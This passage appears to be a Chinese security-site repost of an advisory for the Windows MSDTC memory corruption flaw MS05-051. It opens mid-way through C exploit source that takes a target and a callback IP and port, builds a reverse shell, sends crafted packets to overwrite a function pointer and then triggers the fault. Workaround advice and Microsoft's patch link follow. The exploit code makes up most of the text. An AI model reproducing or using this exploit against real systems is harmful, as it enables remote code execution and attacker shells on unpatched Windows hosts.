Microsoft Windows MSDTC内存破坏漏洞(MS05-051)…

printf("----------------------------------------------\n");
printf("Usage:\n");
printf(" %s [Taget IP] [Target Port] [Your IP] [Your Port] <type>\n\ntype:\n", n);
int i=0;
while(OS[i].TopSEH)
{
printf(" %d %s\n", i, OS[i].description);
i ;
}
}

void main(int argc, char *argv[])
{
if(argc < 6 || argv[argc-1][0] != 'S')
{
help(argv[0]);
return;
}
int itype = 0;
int b = 0;
if(argc == 7)
b = atoi(argv[5]);
char *ip = argv[1];
int port = atoi(argv[2]);


printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
//finish building
printf("(^_^) Context built!\n");

SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("(^_^) Function pointer wrote!\n");

//trigger
printf("(*_*) Trigger fault...");
Sleep(500);
s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("Done!\n(*_*) Any shell?");
}

建议：

---

临时解决方法：

* 禁用MSDTC
* 禁用网络DTC访问
* 在防火墙处阻止以下内容：

端口号大于1024的端口上的所有非法入站流量
任何其他特殊配置的RPC端口

* 使用个人防火墙，如Windows XP和Windows Server 2003捆绑的Internet连接防火墙
* 在支持高级TCP/IP过滤的系统上启用该功能
* 在受影响的系统上使用IPSec阻断受影响的端口

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-051）以及相应补丁:
MS05-051：Vulnerabilities in MSDTC and COM Could Allow Remote Code Execution (902400)
链接：http://www.microsoft.com/technet/security/bulletin/MS05-051.mspx

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有